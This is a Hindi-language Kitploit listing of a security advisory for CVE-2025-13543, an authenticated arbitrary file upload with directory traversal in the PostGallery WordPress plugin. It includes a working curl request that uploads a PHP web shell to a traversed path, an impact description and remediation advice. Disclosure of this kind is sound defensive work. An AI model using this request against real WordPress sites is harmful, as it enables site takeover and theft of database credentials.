Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PostGallery-CVE-Report — CVE-2025-13543 के लिए प्रकटीकरण | Kitploit
उपकरण/GitHubGitHub/mooseloveti/postgallery-cve-report
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubmooseloveti/postgallery-cve-report

PostGallery-CVE-Report

CVE-2025-13543 के लिए प्रकटीकरण

रिपॉजिटरी देखें
8 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

PostGallery-CVE-Report

CVE-2025-13543 के लिए प्रकटीकरण

CVE-2025-13543 - PostGallery में भेद्यता

यह रिपॉज़िटरी PostGallery <= 1.12.5 में खोजी गई एक भेद्यता का प्रकटीकरण करती है, जो rtowebsites द्वारा विकसित WordPress प्लगइन है।

🛠 प्रभावित संस्करण

  • उत्पाद: PostGallery
  • संस्करण: <= 1.12.5
  • URL: https://wordpress.org/plugins/postgallery/

🔒 निर्धारित CVE

CVE IDप्रकारघटकप्रभाव
CVE-2025-13543प्रमाणित (सब्सक्राइबर+) मनमाना फ़ाइल अपलोडlib/ajax-actions/imageUpload.php  admin/PostGalleryUploader.phpअप्रमाणित हमलावर मनमाना फ़ाइल अपलोड कर सकता है

🧾 विस्तृत विवरण

CVE-2025-13543 — प्रमाणित (सब्सक्राइबर+) मनमाना फ़ाइल अपलोड

  • प्रभावित घटक: PostGallery AJAX अपलोड हैंडलर (postgalleryAjaxUpload) और PostGalleryUploader बैकएंड
  • हमला वेक्टर: डायरेक्टरी ट्रैवर्सल के माध्यम से प्रमाणित (सब्सक्राइबर+) मनमाना फ़ाइल अपलोड।
  • ट्रिगर: कोई भी प्रमाणित निम्न-विशेषाधिकार वाला उपयोगकर्ता (जैसे सब्सक्राइबर) डायरेक्टरी ट्रैवर्सल के माध्यम से हमलावर-नियंत्रित पथों पर मनमानी PHP फ़ाइलें अपलोड कर सकता है।
root@kitploit:~
curl -k -X POST "http://localhost:8080/wp-admin/admin-ajax.php" \
  -H "Cookie: wordpress_logged_in_<hash>=<your_cookie>" \
  -F "action=postgalleryAjaxUpload" \
  -F "postid=1" \
  -F "uploadFolder=../../../" \
  -F "name=shell.php" \
  -F "[email protected];type=application/x-php"
  • प्रभाव: कोई भी प्रमाणित निम्न-विशेषाधिकार वाला उपयोगकर्ता (जैसे सब्सक्राइबर) डायरेक्टरी ट्रैवर्सल के माध्यम से हमलावर-नियंत्रित पथों पर मनमानी PHP फ़ाइलें अपलोड कर सकता है। यह वेब सर्वर के संदर्भ में रिमोट कोड निष्पादन की अनुमति देता है, जिससे साइट का पूर्ण समझौता होता है, जिसमें साइट सामग्री में संशोधन, wp-config.php और डेटाबेस क्रेडेंशियल का बहिर्वाह, स्थायी बैकडोर की तैनाती और दुष्ट व्यवस्थापक खातों का निर्माण शामिल है।

❓ भेद्यता का कारण

  • lib/ajax-actions/imageUpload.php में उचित प्राधिकरण लागू करें (उदाहरण के लिए, current_user_can('upload_files') आवश्यक करें) और अपलोड संसाधित करने से पहले एक क्रिप्टोग्राफ़िक नॉन्स सत्यापित करें।
  • admin/PostGalleryUploader.php में, uploadFolder को wp-content/uploads/gallery की किसी ज्ञात उपनिर्देशिका तक सख्ती से सीमित करें, ../ या निरपेक्ष पथ वाले किसी भी मान को अस्वीकार करें, और उपयोग से पहले पथों को नॉर्मलाइज़ करें।
  • WordPress के मानक अपलोड API जैसे wp_handle_upload() / wp_check_filetype_and_ext() का उपयोग करें और अपलोड को गैर-निष्पादन योग्य मीडिया प्रकारों की श्वेतसूची तक सीमित रखें, जिसमें वेब-सुलभ निर्देशिकाओं में .php और अन्य निष्पादन योग्य एक्सटेंशन स्पष्ट रूप से अवरुद्ध हों।

एक बात

मैंने सोचा... कि CTF जैसी ऐसी भेद्यता भी मौजूद हो सकती है। अकेले मनमाना फ़ाइल अपलोड ही भयानक है, लेकिन साथ में डायरेक्टरी ट्रैवर्सल होना... कितनी निराशा की बात है। भेद्यता का पुनरुत्पादन बहुत मज़ेदार था।

🔍 खोजकर्ता

नाम: MooseLove
भूमिका: स्वतंत्र सुरक्षा शोधकर्ता / बग हंटर
संपर्क: अनुरोध पर उपलब्ध


📚 संदर्भ

  • उत्पाद: https://wordpress.org/plugins/postgallery/

⚠️ लाइसेंस

यह एडवाइज़री सार्वजनिक सुरक्षा जागरूकता के लिए प्रदान की गई है। श्रेय सहित साझा करने के लिए स्वतंत्र।

टूल डाउनलोड करें